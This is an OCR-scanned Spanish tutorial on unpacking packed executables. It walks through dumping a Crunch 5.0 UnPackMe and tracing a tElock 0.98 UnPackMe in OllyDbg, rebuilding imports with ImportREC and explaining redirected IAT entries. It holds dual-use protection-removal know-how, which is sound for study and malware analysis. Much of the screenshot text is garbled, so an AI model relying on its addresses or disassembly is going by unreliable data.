.rsre 00008000 00063000 00008000 00063000 CO000D4O 
.edata — 000477EE — 00068000 000477EE 00068000 E0000020 


Rebuild Import 
(* Method! : Search JMP[API] | CALL[API] in memory image 
C Method2 : Search DLL 8: 4PI name string in dumped file 


Le quitamos la tilde a Rebuild Import y dumpeamos. 


SY Y y 


MiPC Mis sitios de Papelera de 
red reciclaje 


(0) o, 
y 


bitarts_eval,.. 


Luego abramos el IMP REC sin cerrar el OLLYDBG, con el original detenido en el OEP. 


áltach to an Ááctive Process 


Je Mwebiheramientastf-g-hi-kbimportreconstructorl 6fimportrec.exe (O0OOD44C 
c:idocuments and settinastricardoescritorio«bitarts evaluation.c.exe (ODOOOEE 4) 
c:4archivos de programattechsmithsnagit 8Mtschelp.exe [00000244] 
c4archivos de programattechsmithisnagit 84 snagit32.exe [DODODSF4] 

ci 4archivos de programa! openoffice.org 2.0 programisoffice.bin (00000584) 
c4archivos de programa+openoffice.orq 2. 04programisoffice.exe [OOOOOSE 4] 


(ms E 


Buscamos el proceso en el menu desplegable y le colocamos los valores hallados. 


147 Infos needed 


DEP | 00027180 _1AT AutoSearch | AutoSearch _lAT AutoSearch [| 
Ava | 00060818 Size [0000071 


Load Tree | Save Tree | Get Imports l 


Y apretamos GET IMPORTS 


Import REConstructor v1.6 FINAL (C) 2001-2003 MackT/uCF 


áttach to an Active Process 


c:idocuments and seltingsticardo+escritorio«bitarts_evaluation.c.exe (ODODODEE 4] 


Imported Functions Found 


adwapi32.dll FT hunk:00060818 NbFunc:5 [decimal:5] valid YES 
comctl32. dll FThunk:00060830 NbFunc:2 [decimal:2] valid YES 
adi32.dll FThunk:0006083C NbFunc:4D (decimal: 77] valid:YES 
kernel32. dll FThunk:00060974 NbFunc:8C (decimal: 140) valid: YES 
oleaut32. dll FThunk:00060B48 NbFunc:10 [decimal:16) valid:YES 
shell32. dll FThunk:O0060BEC NbFunc:3 [decimal:3] valid"YES 
user32. dll FT hunk:00060BFC NbFunc:43 [decimal:163] valid: YES A 
sinmam. dll FT hunk:00060£8C NbFunc:1 [decimal:1] valid: YES 
winspool. dre FThunk:00060E 94 NbFunc:8 [decimal:8] valid: YES 


[> 


AN 


E---E-4-E-E 


+) 


ME 


Log 
rea: DOO60B5C forwarded from mod:ntdll.dll ord:00D1 name:RtlGetLastwin32Error A 


Vemos que el packer no hace mucho por molestarnos todas las dlls estan correctas asi que 
apretamos FIX DUMP y buscamos el dumpeado para que lo repare. 


Loy 


Fixing a dumped file... 
C (decimal: 12] module(s) 

183 (decimal: 441] imported function(s). 

** New section added successfully. AVA; E SIZE:0000204 
Image Import Descriptor size: FO; Total lenath: 1 
CADocuments and SettinastRicardo'Es a wunpacked .exe saved successfully. 


11> 


el 


Lo guardo al reparado con el nombre unpacked_.exe, probemoslo a ver si funciona. 


Coded by Teddy Rogers / SnD Team 2005 [Xx] 


Crunch 5.0.0 UnPackMe 
Compression + Encryption 


If you umpack it write a tutorial... :) 


Funciona perfectamente, por lo cual no tiene antidumps, los cuales seguramente encontraremos mas 
adelante en packers mas complejos. 


La proxima victima es el telock 0.98 que nos servira para empezar el tema de las entradas de la IAT 
redireccionadas. 


-98.exe - [CPU - main thread, module UnPackMe] 
[c] File View Debug Plugins Options Window Help 


CELE a] vij+l $0 ul + 1jejmt[wju[c]7Jx]8]R/-.s| E 


25E4FFFF UnPackMe. 06465900 
CHAR *d” 
CHAR 'b” 
CHAR *j” 
75 CHAR ur 
BBB6SCIE Struct ” IMAGE_IMPORT_DESCRIF 


AARRARARA 


Pribemos el metodo del pushad, traceemos un poco a ver si hay algun PUSHAD. 


COEN ALMMT SE A AT 7 O 


¿0 PUSHAD 

ES 02000009 | CALL MM465099 UnPackMe. DO4650B9 
ES DB Es 

ga DB 60 

ES 000090008 | CALL BB465ABE UnPackMe. DO04650BE 
SE POP ESI 

SUB ECX, ECX 

POP_EAX 


UnPackMe. 00465016 
INT 20 


Pa misnmmmr Lismas rra ama 


Pasemoslo con f7, luego marcamos ESP-FOLLOW IN DUMP. 


60 Eb FD 7F 


» 30 Ba|.2O0Gu2 E ho... 
4F 6D 81 70 D 
38 A9 54 8£ —Copy » EF 
F3 99 83 ?( , a 
po 60 6606 Binary » | 
» 


Search for > Memory, on write 
Follow DWORD in Disassembler 
Follow DWORD in Dump 

Go to » 


Breakpoint Memory, on access | 


| 

| 

| Hardware, on write 

| Hardware, on execution 


vw Hex > 


LJ ru IVY LOLI PG dl ES YM II nes 


Quitemos el analisis a si se ve el codigo. 


Copy to executable » E | La 
Analysis » Analyse code 
Dump debugged process Remove analysis from module 


Sram nhiart filas 


Vemos que el metodo del pushad no funciona y que ademas esta protegido contra HARDWARE 
BREAKPOIN!TS porque si lo sigo corriendo da error, asi que quito el hardware breakpoint que 
coloque. 


TestDbg - UnPackMe_tElock0.98.exe - [ 
na Plugins Options Window 


Run F9 
Pause F12 
Restart Ctri+F2 
Close Alt+FZ 
Step into F? 
Step over FS 
Animate into Ctri+F? 
Animate over Ctri+F8 
Execute till return Ctrl+F9 


Execute till user code AlH+F9 


Open or clear run trace 


Trace into Ctri+F11 
Trace over Ctri+F12 
Set condition Ctrl+T 
Close run trace 


vare breakpoints 


Insnert 


Hardware breakpoints 
H Base Size  Stopon 


F 
¿ 
h 
| Forero Ja foo 
b 
¡ > == má uN Follow 2 


Y reincio el OLLYDBG. 


Pues ese metodo no va, probemos con el de las excepciones, limpio el LOG y lo hago correr al 
programa para que me liste las excepciones que pasa. 


INT3 command at UnPackMe. 10465080 
Integer division by zero 

Illegal instruction 

Integer division by zer 

INT3 command at UnPackMe. BaB465B27 
Integer division by zero 

Access Violation when reading _LFFFFFFFFI 
INT3 command at UnPackMe. B0465BFO 
Module C:wWINDOWS3system32WINMM. dll 
Module Co wWINDOWSssystem32ADVAPIS2. dll 
Module C: WINDOWS system32sRPCRT4. 011 
Module C: WINDOWS +system32userwvdrv. dll 
Module Ci owINDOWSssystem32uumdma fm. dll 
Module C:WINDOWS>system32acomdl9g32.d1!1 
Module Ci WINDOWSssystem32xSHLWAPT. dll 
Module C:sWINDOWS>system32amsucrt. dll 
Module Ci WINDOWS +system32xCOMCTL32.d1 1 
Module C:oWINDOWS+system32sSHELL32.d1 1 
Module CiowINDOWS+WinS+Sx86_Microsoft.Windo 
Module CiWwINDOWSssystem32WINSPOOL. DRU 
Module C:sWINDOWS»system3zrnoledlg. dll 
Module C:SWINDOWSssystem32sole32.d1l 
Illegal instruction 

Module C:oWINDOWSssystem32x0LEAUT32.d1l 
Module C:owWINDOWSssystem32uuxtheme. dll 
Modu le Sr ar eco dll 
Module Ci WINDOWS system32RICHED32. DLL 


Command | 


Pues quitemos las tildes de las excepciones y reiniciemos tratando de pescar la de 4666f1 que es la 
ultima del desempacador. 


ES Debugging options 


Commands | Disasm | CPU | Registers | Stack | Analysis 1 | pl 
Security | Debug | Events  Exceptions | Trace | SFX | 


[W- Ignore memory access violations in KERNEL32 


Ignore (pass to program) following exceptions: 
1” INT3 breaks 
TT Single-step break 
Memory access violation 
Integer division by O 
FT Invalid or privileged instruction 
T ANFPU exceptions 


Ignore also following custom exceptions or ranges: 


20000002 (DATATYPE MISALIGNMENT] Add la 
CODO008F (FLO4T INEXACT RESULT] e) 


Ac 
Delel 
E 


Pues luego de pasar varias excepciones con SHIFT mas f9 llegamos a 4666fl1. 


PEPE 20l visi $08 el +] LjelmjtiwiujclvJ£lmlr]--s] 3 


LEA ERX, ERX Illegal use of IN 
UnPackMe. B04666F6 
UnPackMe. 0046675F 


UnPackMe. 004666F9 


OR EAX, ERX 


INT 26 
MOU ESP,DWORD PTR SS: [ESP+8] 
EAX, EAX 


FOR ñ 


CD 26 
3B6424 8 
3300 


Prima me 


Pongamos ahora un MEMORY BREAKPOINT ON ACCESS en la primera seccion. 


00349000 | 000010009 Priv] Ru Ru 
00389000 | OBBBIOBB Priv! Ru Ru 
00400000 | 00061000 | UnPackMe PE header | Imag|Rl RUE 


90491998 0004A000 UnPackMe .teddy |code : 
00446000 | B0B6COG6' UnPackMe| .teddy  |data Actualize 
e 5000090900 | UnPackMe! .teddy . pe 
BB! BBBB3OBA | UnPackMe! .teddy View in Disassembler Enter 
B| B0BB2006' UnPackMe! .rsrc resou A 
00465000| 00004000! UnPackMe| .teddy |SFX,i|  Dumpin CPU 
00470000 | 00009000 D 
DOSa0000| BB183000 an 
00650000 | OB1GSBDA Search Ctri+ 
00970000 | 00001000 


151501 9515/5/5105/5/515P15]515] -0n- 
00h0000Ó| BOBO200O Set break-on-access F2 


es es | 
00AS0000| BOBOZADO Set memory breakpoint on access ho 
00440900 | 00004000 Set memory breakpoint on write 


D0AS0000 | DOBOBSO0A 


Recordemos que debemos apretar SHIFT mas f9 para pasar la excepcion que estamos parados si no 
dara error, lo hacemos. 


Bueno para en un par de excepciones del tipo SINGLE STEP y llega al OEP en la primera seccion 
donde para por MEMORY BREAKPOINT ON EXECUTION. 


1] Fla 


Real entry point of SFX code 


PUSH_EBP 
MOU EBP,ESP 
6R FF PUSH -1 

63 65BE4500 PUSH 450E60 
63 CS924200 PUSH_429203 
64:A1 000090009|MOU EAX, DWORD PTR FS: [6] 
50 PUSH_EAX 


64:8925 BB0BBB! MOV DWORD _PTR FS: [0],ESP 
8304 AS = 


DO 


56 
57 


00000000 0 00 00 0 


HON D 


H_EDI 
8965 ES MOU DWORD _PTR SS: [EBP-18],ESP 
FF15 DCoA4606 

0427 33D2 XOR EDX, EDX 
AñA?71NMF 2aomrnd matt ni 0 


Por lo tanto el oep es 4271B0, el mismo que el del ejemplo anterior de CRUNCH, por lo cual 
parece ser el mismo programa empacado con otro packer, igual lo trataremos como si no 
supieramos nada de el. 


Bueno en el ejemplo anterior sabiamos que ese call que esta a la vista iba a la api Ge Version, pero 
en este caso no es asi, aquí comienza el tema de entradas redireccionadas jeje. 


Si hago 


DI 
=D 
DDDID 


Tol 


DD 


All commands 


sn] : HP árs.:$.] Lás 
2 Name (label) in current module Ctrl+PW 
¿SF | Findreferences to > Nameinall modules 
e View Er Í TC —— 
 9F Command Ctrl4F 
1 9F Copy to executable » 
| 9F , Sequence of commands Ctrl+S 
| SF Analysis » 
11 Constant 
| OF Dump debugged process . Ñ 
OF Binary string Ctrl+B 
Era Appearance » Next Ctrl+L 
¡AB 
l de ¡a AD Ja AD All intermodular calls 
LA 

A 


DOE 


ZRoOn: 
DDDD 


para ver los CALEs que se dirigen a otras secciones, intentando ver si hay calls a alguna api. 


Hagdress [ULSassemb ly |[Uest inat ton 
BB4231C3| CALL FC4273FE 
B0423310| CALL DWORD PTR DS: [(460AB6] DS: [00460AB07=009F661C 
B042394F | CALL DWORD PTR DS: [46006] DS: [00460400 7=009F620F 
B0423B1C| CALL DWORD PTR DS: [46B9FCI DS: [0046B9FCI009FO29E 
00423043| CALL DWORD PTR DS: [(46B9FCI DS: [0046B9FCI009FO29E 
00423CA8| CALL DWORD PTR DS: [4609F3] DS: [004609F3]=009F028D 
00423ESC| CALL DWORD PTR DS: [460458] DS: irene a ri cs 
B0423E96| CALL DWORD PTR DS: [46BBS5C] DS: [B046BBSCI009FB973 
004249B6| CALL DWORD PTR DS: [4609F4] DS: [B004609F4]=009FB27C 
00425003| CALL DWORD PTR DS: [460B98] DS: [00460693 ]=009F6AAD 
00425183 | CALL DWORD PTR DS: [460B98] DS: [00460693 ]=009FGAAD 
B04251C7| CALL DWORD PTR DS: [460694] DS: [006460894 ]-009F6A7D 
0042520B| CALL DWORD PTR DS: [460694] DS: [00460694 ]=009FBA7D 
004252D4| CALL DWORD PTR DS: [460694] DS: [0046594 ]=009FBA7D 
BO4252FB| CALL DWORD PTR DS: [460978] DS: [00460973]=009F0011 
B0425306/ CALL DWORD PTR DS: [460974] DS: [00460974 ]=009F0000 
B042535E | CALL DWORD PTR DS: [(4609B0] DS: [004609B07-=009F6124 
904259D1/ CALL DWORD PTR DS: [46054] DS: [00460454 ]-=009F0447 
004259E8| CALL DWORD PTR DS: [(46BA3CI DS: [0046BA3C I=009F63DC 
004259FS| CALL DWORD PTR DS: [460444] DS: [0046044 ]=009FO3FE 
00425B2B| CALL DWORD PTR DS: [(460AFS] DS: [00460AFS]I=009F0785 
0042563F | CALL DWORD PTR DS: [46BAFS] DS: [00460AFSI=009F0785 
00425853| CALL DWORD PTR DS: [46BAFS] DS: [0046B0AFSI=009F0785 
004258F1/ CALL DWORD PTR DS: [(46BAFS] DS: [0046B0AFSI=009F0785 
B0425C9C| CALL DWORD PTR DS: [466970] DS: [00460970 I=009F0022 
B0425C0A6 | CALL DWORD PTR DS: [46BBS5CI DS: [0046BB5CI=009F0973 
00425071| CALL DWORD PTR DS: [460454] DS: [00460454 ]=009F0447 
0042508B| CALL DWORD PTR DS: [460430] DS: [0046BA3CI=009F63DC 
B042508B' CALL DWORD PTR DS: [460044] DS: [00460044 ]=009FO3FB AS 
B0425E13| CALL DWORD PTR DS: [460698] DS: [00460693 ]=009FOAAD 
B0425E27 | CALL DWORD PTR DS: [460694] DS: [00460694 ]=009FB6A7D 
B0425E6B| CALL DWORD PTR DS: [460694] DS: [00460694 J=009F6A7D 
O0425F34 CALL DWORD PTR DS: [460694] DS: [00460694 J=009FBA7D 
'14271B0| PUSH EBP [Initial CPU selection) 
80427106 CALL DWORD PTR DS: [46BADCI DS: [0B4É6BADCI=009FB6F7 
0042723E| CALL DWORD PTR DS: [460984] DS: [00460984 ]-009F0041 
004272D5/ CALL DWORD PTR DS: [460988] DS: [004609807-=009F0033 
B04272F6| CALL DWORD PTR DS: [466B9C] DS: [006460B9C I=009FBAB1 
004274F7| CALL 00435CCO UnPackMe. 00435CC0 
B04277F3| CALL 00435CCO UnPackMe. B0435CC0 
00427929| CALL DWORD PTR DS: [460980] DS: [00460980 I=009F005F 
B0427E07| CALL DWORD PTR DS: [460484] DS: [0046084 ]=009F0539 
B0427E0E| CALL DWORD PTR DS: [460994] DS: [00460994 ]=009F608D 
B0427E98| CALL DWORD PTR DS: [460996] DS: [004609907=009F007F 
004238029 CALL DWORD PTR DS: [4609F3] DS: [004609F3]=009F628D 
0042380BB| CALL DWORD PTR DS: [(4660A08] DS: [006460468 J=009FB2CC 
00428823| CALL DWORD PTR DS: [460454] DS: [00460A54 ]-=009F0447 
00423884D| CALL DWORD PTR DS: [460430] DS: [0046BA3C I=009F63DC 
B042836E | CALL DWORD PTR DS: [460044] DS: [0046044 ]=009FO3FB 
004283AE | CALL DWORD PTR DS: [46BASCI DS: [00646BA3CI=009F63DC 
004283E0| CALL DWORD PTR DS: [(46BAS3CI DS: [00646BA3C I=009F63DC 
B0423891E| CALL DWORD PTR DS: [460544] DS: [0046044 J=009FO3FB 
00423950/ CALL DWORD PTR DS: [460544] DS: [00460944 ]=009FO3FB 
004238983| CALL DWORD PTR DS: [460698] DS: [00460B93]=009FBAAD 
ARÍSRNARIFALI MARA PTR NS: PARAR. 1 NS: PARSARARIF.I1ZAMASFADRA 


Veo que hay muchismos Calls indirectos que en vez de dirigirse a una api de una dll, van en este 
caso una seccion 9fxxxx en mi maquina, pero que en su maquina puede variar y ser otra direccion 
parecida.. 


Si miro mas abajo en esta lista 


UU?I2D9T | CALL — DWUMNLD Fin 13, LADUTTUJS DI LUVIADOO TUS -—DU7TTUEOE 
60435096: CALL DWORD PTR DS: [460B74] DS: [00460B74]=009FO9FO 
604350F1/ CALL DWORD PTR DS: [4604AB0] DS: [B04654B597-009F061C 
B0435E06 | CALL DWORD PTR DS: [4604B4] DS: [B046504B4]-009F0636 
BOB435FAS| CALL MB435CDE comdl332.PrintDlgA 
60436004 CALL DWORD PTR DS: [4664007 DS: [60465400 7=009F06B5 
6043602E | CALL DWORD PTR DS: [4664007 DS: [60465400 7=0609F06B5 
66436060. | CALL DWORD PTR DS: [4664007 DS: [60465400 7=0609F06B5 
6B04360AB | CALL DWORD PTR DS: [46604067 Ss SS 
B04369D1| CALL BM435CDE ia ntDlgA 
60436118! CALL DWORD PTR DS: [460878] Ds: [004 6be781= 20ñ10124 
10436230! CALL DWORD PTR DS: [460B74] DS: [004650B74 ]=009F09FO 
B04362EC| CALL DWORD PTR DS: [466CACI DS: [B04658CACI=060A00360 
60436315 CALL DWORD PTR DS: [466004] DS: [60466004 ]-06400419 
00436351! CALL MM435CEA condl932.GetOpenF i leNameA 
00436358 | CALL 00435CE4 comdl3932,GetSaveF i leNameA 
60436374 CALL DWORD PTR DS: [460D0F4] DS: [0604600F4 ]-=650A009E7 
60436382 | CALL DWORD PTR DS: [460CB0] DS: [B60465CB907-00A00370 
B0436407 CALL DWORD PTR DS: [46BE78] DS: [00469E78]=00A00C52 
6043644E CALL DWORD PTR OS: [460E78] DS: [604650E73 106400052 
6B64366CA | CALL DWORD PTR DS: [468DFCI DS: [6046580FCI=06A009FO 
66436805 | CALL DWORD PTR DS: [460048] DS: [60465043 ]-06A00669 
£04368DB | CALL DWORD PTR DS: [460048] DS: [60465043 ]-060A00669 
604368F1| CALL DWORD PTR DS: [460048] DS: [6046050043 ]-00A00669 
00436907| CALL DWORD PTR DS: [460D48] DS: [9004600438 ]-=00A00669 
6043691D' CALL DWORD PTR DS: [460048] DS: [060465043 ]-00A00669 
60436933 CALL DWORD PTR DS: [460048] DS: [004605043 ]-06A00669 
60436464 CALL DWORD PTR DS: [460E78] DS: [00460E73]=0B0A90C52 
B0436BD0 | CALL BM435CFC comdla32.FindTextA 
B0436BD7| CALL BM435CF6 conmdl932.ReplaceTextA 
B6436CB1 | CALL DWORD PTR DS: [460448] DS: [BM465A4AS ]=009FABSEC 
B0436CC3| CALL DWORD PTR DS: [46BAACI DS: [90460AACI=0909FBSFD 
ARÍA79GF NAL MINAN PTR MS: 14ARAN421 NS: TARÍAANIS1AADARRAS 


Vemos que hay algunos CALLS directos que nos marca que van a apis, seguramente por medio de 
un JMP INDIRECTO, vayamos a ver alguno de estos CALLS. 


4 ]h.h Cod lc AN di O aa 1 | 1 9 y 4 7 0 9 Y 5 J/ meras 
ES 34FDFFFF JMP to conmdl932.PrintDlgA 
8BCE MOU ECX,ESI 

SBF8 MOU EDI, EAX 

ES, SE4E0008 CALL B043AE21 UnPackMe. BB43AE21 


TEST EDI,EDI 
UnPackMe. 00435FBEB 


MOU EAX, EDI 
UnPackMe. 00435FBE 
PUSH_2 
POP ERX 
POP EDI 
POP ESI 
RETN 


Alli tenemos uno, es un CALL 435CDE que ira seguro a los JMPS INDIRECTOS a las apis, 
marquemoslo y hagamos click derecho- FOLLOW. 


30435COE 


.«StartPagePrinter 


.OpenPrinterA 
+«EndPagePrinter 
«WritePrinter 
.DocumentPropert ¡esA 
oledlg. OleUIBus yA 


Alli vemos los saltos indirectos a las apis, por lo tanto sabemos que toman valores de la IAT, o sea 
que 460ED4 es una entrada de la IAT, vayamos en el DUMP a verla. 


ad 


SPP ERE 


3sbvál6UTiPuÉTTO 


Vemos que la parte final de la IAT es correcta y coincide con la del ejemplo de CRUNCH, el final 
de la IAT aquí tambien es 460F28, es facil detectarlo pues aquí si termina la IAT y empiezan todos 


ceros, ahora subamos. 


EBP=0b12FFFO 


Da 


DO o DE S S 
e NN =D DE e 
AD E E OE a 


DOS 
ES8BL8]JJIA ANN 
dos 


IIA DORADO 
D D 


a 
Da 


Vemos ya, que el proximo grupo esta conflictuado, la primera entrada arriba de la separacion 


o Flor 
and*: 
y GQ o + A 

á Wa? 

+ 0 (0 (0 (+ 
OÉCSDA va 

MDI vr 

- OOO 

Ko (19 (210 (+ + 

aa aia 


«¿.b.ó. 


. 
Bb 


$.3.T.3.EVó.d.d. 
2.3. 193..03. 793. 
P33.adá.odi."3á. 
PTE idá. «194. jad. 


Fi Meat 
Erorsf rer*rcoor 
97-10 A-rgatrestr 
no VIT UESTY 
3ibvál6vii7uET TV 
=FESUFTÓV. . . .H3Lw 
£icMwlrBOw, 3Lw r+Lw 
s3PwPdMweARW3*Rw 
LaTw:2TWE£OWOlWRw 
038 INwE ZW... 
cl oso Agus 


corresponde a 76B1A8F7 si la marco y hago click derecho-FIND REFERENCES. 


Address |Disassembly 


40E203| CAL : [4 
00460E95| JE SHORT 60460ESF 


Vemos que pertenece a la api PlaySoundA de la WINMM.dll de alli para arriba, no encuentro mas 


valores que vayan a dlls, pero si busco referencias. 


WINMM.PlaySo: 
UnPackhe. B0460ESF 


Comment 


undA 


Address | Disassemb Ly | Comment 


B04633A6 | CALL DWORD PTR DS: [(460E48] DS: [B0460E45]=00A00661 
0040647D6' CALL DWORD PTR DS: [460E483] DS: [00465E48]=00A50B61 
00464923 CALL DWORD PTR DS: [460E483] DS: [00460E£48]=060A00661 
00404AD9' CALL DWORD PTR DS: [460E48] DS: [00460E43]=00A00B61 
00413318 CALL DWORD PTR DS: [460E48] DS: [00460E458]=00A00B61 
004171DE CALL DWORD PTR DS: [460E48] DS: [B00460E48]=00A00B61 
0041A61E CALL DWORD PTR DS: [(460E48] DS: [00460E£48]-00A00B61 
00421045 CALL DWORD PTR DS: [460E48] DS: [00460E438]-00A90B61 
00430912 CALL DWORD PTR DS: [460E48] DS: [00460E48]-00A00B61 
9043DCCO| CALL DWORD PTR DS: [460E48] DS: [00460E48]-=00A00661 
0043E9D6' CALL DWORD PTR DS: [460E48] DS: [00460E458]=00A00B61 
B043EASA | CALL DWORD PTR DS: [460E48] DS: [00460E438]=00A00B61 
00441B0A| CALL DWORD PTR DS: [460E48] DS: [00460E48]=00A00B61 


Veo que si existen referencias, por lo cual aquí hay un punto, cuando llegabamos subiendo y 
bajando al inicio de la IAT si buscabamos arriba del inicio, por ejemplo, no encontrabamos ninguna 
referencia, pues el programa salta a las apis de las dlls, por medio de la IAT, fuera de la misma ya 
no encontramos ninguna referencia, ahora aquí vemos que estas son posibles entradas de la IAT, ya 
que hallamos referencias que toman valores de ellas en el codigo, pero, en vez de saltar a las dlls, 
salta a una seccion que en mi caso, esta en AXxxxx o puede variar según cada maquina, como es 
esto? 


Pues esto es lo que se llaman entradas redireccionadas, el desempacador al ejecutarse, sobrescribe 
algunas de las entradas a la IAT con valores que apuntan a rutinas propias, en el caso de la imagen 
anterior 


004038A6 CALL DWORD PTR DS:[460E48] 
Comment=DS:[00460E48]=00A00B61 


En vez de guardar la direccion correcta de la api en mi maquina, el desempacador reemplaza dicha 
direccion por una direccion de una seccion propia creada por el, en tiempo de ejecucion, y alli pone 
una rutina que al final termina yendo a la api correcta. 


Para aclarar un poco veamos la entrada a GetVersion que esta en el inicio del programa debajo del 
OEP. 


PA ol ic a aa iaa 1 O Y Y 4 94 4 Y $ ?  PmÑeAA 


Real entry point of SFX code 


PUSH_EBP 

MOU EBP,ESP 

PUSH -1 

PUSH 450E60 

PUSH_ 429203 

3| MOU EAX, DWORD PTR FS: [6] 
PUSH_EAX 


MOV DWORD_PTR FS:[07,ESP 
ADD ESP, -58 


004271D1| 56 PUSH ESI 

aBB4271D2 5 PUSH EDI 

00427 8965 ES MOU DWORD _PTR SS: [EBP-18] 
15 Y4 

XOR EDX, EDX 


MOU DL, AH 
MOU DWÓRD_PTR DS: [45634], EDX 


Realmente no sabemos que va a GetVersion, solo porque el ejemplo anterior era un programa 
similar pero empacado con CRUNCH lo sabemos, pero realmente hasta aquí, para nosotros es un 
CALL INDIRECTO, lleguemos hasata el con f7 y entremos en el a ver donde va. 


144.4 bf yá. 
49. .L4f.64f.G4f. 
Ref. ¡2f.wef.3ef. 


D 
D 
E 
T er 
no 


mii) 
PC cEoORGE:: 


. 
MADILIO A 


7 


JElWePRWOP AY PPAR 
PP PH LIL 


003.403.083. <03. 
Ti. 0á. Ba. »Dá. 
”"93.203.C003.b9á. 
183.193.<04.»8á. 
+03. 1r03.M93.* 9á. 
«03. ,43.=03.N43. 
"93.p43.1i03. 303. 
ILLERA ENERO EA 
143..03. 143.903. 
Ge3.je3.(e3. 1eá. 
Xx$3.*43.703. 103. 
cal 23 +£3 +13 


Vemos que para ver donde va toma el valor de lo que aun no sabemos con certeza, pero son 
posibles entradas de la IAT ya que mas abajo vemos entradas correctas a apis. 


ma] 2j0y “si? $4 y 3 PES 2099 4) 15 
SE 


SETNO BYTE PTR DS: [EDx+40] 
MOU EAX, 9F17D3 

INC ERX 

PUSH DWORD PTR DS: [EAXI 


INT 20 
ADD EAX, ”CE1AE1D 
MOU EAX, 9F17D7 


Th Ta 


Por lo tanto el programa al ejecutar ese CALL va aquí que en mi maquina a la direccion 9F06F7, en 
las suyas puede cambiar. 


Esta direccion no pertenece a las secciones del programa en si. 


B0260000| BOBB300A Map |Ru RU 
002700009 | BOB16000 Map |R R Dev icesHarddiskUo lu 
00290000 | 00930000 Map |R R Device sHarddiskUo lu 
00200000 00041000 Map |R R Device sHarddiskUo lu 
00320000 | DOBBSOAB Map |R R Device sHarddiskUo lu 
00330000 | 00041000 Map ¡R R 
00320000) 00091009 Privi RWE RWE 
00390000) 00091009 Privi RWE RWE 
B0390000| 00991000 Privi Ri RU 
0380000 000901000 Priv! Ri RU 
004900009 ADOS UnPackMe PE header Imag|RU RUE 
004901000 00044000 UnPackMe| .teddy code Imag| RW RWE 
B6CO00 | UnPackMe!| . teddy data Imag| RW RWE 
60009900) UnPackMe' . teddy Imag| RW RWE 
6 00003990) UnPackMe| . teddy Imag| RU RUE 
D0B02000' UnPackMe| .rsrc resources | Imag|Ru RUE 
50465000 | 009004000) UnPackMe'| . teddy SFX, imports| Imag| RW RWE 
00470000 | 00BB900B Map ¡RE RE 
00530000 | DOBBZ2000 Map ¡RE RE 
00540000 | 001903000 Map ¡R R 
B065B000 | DO1B600A Map ¡RE RE 
50970000 | 0091000 PrivlRu Ru 
B09FOBDO BBDBZ0DA Priv Ri RU 
BORO >909 | BABBZ00B Privi Ri RU 
BBAÍ 00091009 Priv| Ri RU 
BDAZ 00004009 Priv! Ri RU 
BBA30006| BOBB3BDA Map |R R ADevicerHarddiskVo lu 
00440000 | 00004006 Priv| Ri RU 
DOASDOOÓ | DOBOBZO0A Priv! Ri RU 
DORGDOGÓ | DOBBZOGA Map ¡R R 
00970000 00091000 Priv! Ru Ru 
A127ARAA! ARARZARA Man |R R 


Alli vemos las secciones del programa en celeste y mas abajo una seccion sin nombre donde esta 
ubicada la rutina donde salta el programa, fuera de las secciones del mismo. 


Si reiniciamos el programa vemos que esa seccion no existe al inicio. 


560330000 /| 00041000 Map ¡R R 
60330000 | 60BB10BO Priv! RWE RWE 
50390000 | 00961000 Priv! RWE RWE 
B03A0000 | 00BB10BO Priv|Ru Ru 
500380000 | 00061000 Priv! Ru Ru 
500400000 / 60961000 UnPackMe PE header Imag R RWE 
60401000 / 60044000) UnPackMe' . teddy code Imag R RWE 
00448000) B0498COBA UnPackMe| .teddy data Imag|R RUE 
00457000 0099890009 UnPackMe| . teddy Imag|R RUE 
00460000 UnPackMe| . teddy Imag R RUE 
0046309009 | Ba BO! UnPackMe| .rsrc resources |Imag¡R RWE 
50465000 | 009004000 UnPackMe' . teddy SFX, imports| Imag|R RWE 
500470000 /| BOBB9DDA Map [RE 
50530000 | BOBB2000 Map ¡RE RE 
50540000 | 00103000 Map ¡R R 
60650000 | 00106000 Map ¡RE RE 
77010000 | 00901000 | user32 PE header Imag|R RWE 
77011000) 000SFOBB|user32 «text code, import: Imag|R RUE 
77070000 | 00002000 | user32 «data data Imag|R RWE 
227072404! ARAARASRARA! 1eor22 vero POScmirros Tman! R RUE 


Por lo tanto vemos que fue creada por el programa mientras se va desempacando, ahora, podemos 
verificar el momento en que dicha seccion es creada? 


Pues podemos poner un BP VirtualAlloc que es la api encaragada de crear secciones virtuales y 
ubicarlas. 


| | | bi BO | 


Command Bp VirtualAlloc Jl 
| Analysis interrupted 


Ahora demos RUN y si pongo todas las tildes en exceptions vemos que el programa no corre y se 
termina, por lo cual es obvio que detecta el BP que acabo de poner, probemos ponerlo en el RET de 
la api. 


[BA bo! Mica [ac PEI [ln JC AO e Y 1) 1949194014490 -d).yO me 


?C FF?S 14 PUSH DWORD PTR SS: CEBP+14] 
FF7S 18 PUSH DWORD PTR SS: CEBP+10] 
FF75 BC PUSH DWORD PTR SS: [EBP+C] 
FF75 88 PUSH DWORD PTR SS: CEBP+8] 
6A FF PUSH -1 
24| ES 090909008 CALL _7CS8a9An2 kernel32.VirtualAl locEx 
AS9| 5D POP EBP 
c2 1000 RETN 109 
E NOP 
El] NOP 
20 NOP 
Ahora doy RUN 


Pa =— 234 +44 Y) +3 HUMO AAA =185 7) 


PUSH DWORD PTR S5:LEBP+14] = 
PUSH DWORD PTR SS: [EBP+10] Begisters (EPI 
PUSH DWORD PTR 55: LEBP+C1 
PUSH DWORD PTR SS: CEBP+5] 


kernel32.VirtualAl locEx 


h BBBSI9SE 


Como para en el retorno de la api, la misma devuelve en EAX la direccion base de la seccion creada 
en este caso paro, y creo una seccion en 3c0000, sigamos. 


isters (FPU) 
—] EAX 'BO950BA 

o] ECX 7CSM9RE9S kex 

=|EDX 7C91EB94 ntc 
—|EBX 00001610 
ESP BB12FF64 
EBP BBB5S995E 
ESI 000409002 
EDI 50059976 


EIP 7CS809A9A ke 
CO ES 6B23 32t 


Vemos que va creando secciones las cuales podemos ver en el mapa de memoria 


560380000 | 009601000 Priv| Ri tw 
50400000 | 090991000 | UnPackMe PE header Imag|R RWE 
50401000 | 00044000 | UnPackMe! . teddy code Imag|R RWE 
00448000 | BOBACOBA | UnPackMe! . teddy data Imag|R RWE 
50457000 | 609989000 | UnPackMe| . teddy Imag|R RWE 
50460000 | 609983000 | UnPackMe! . teddy Imag|R RWE 
60463000 | 00062000 | UnPackMe| .esrc resources Imag|R RUE 
60465000 | 000040090 | UnPackMe| .teddy SFX, imports| Imag|R RWE 
00470000 | BOBB90BA Map ¡RE RE 
50530000 | OOBB2000 Map ¡RE RE 
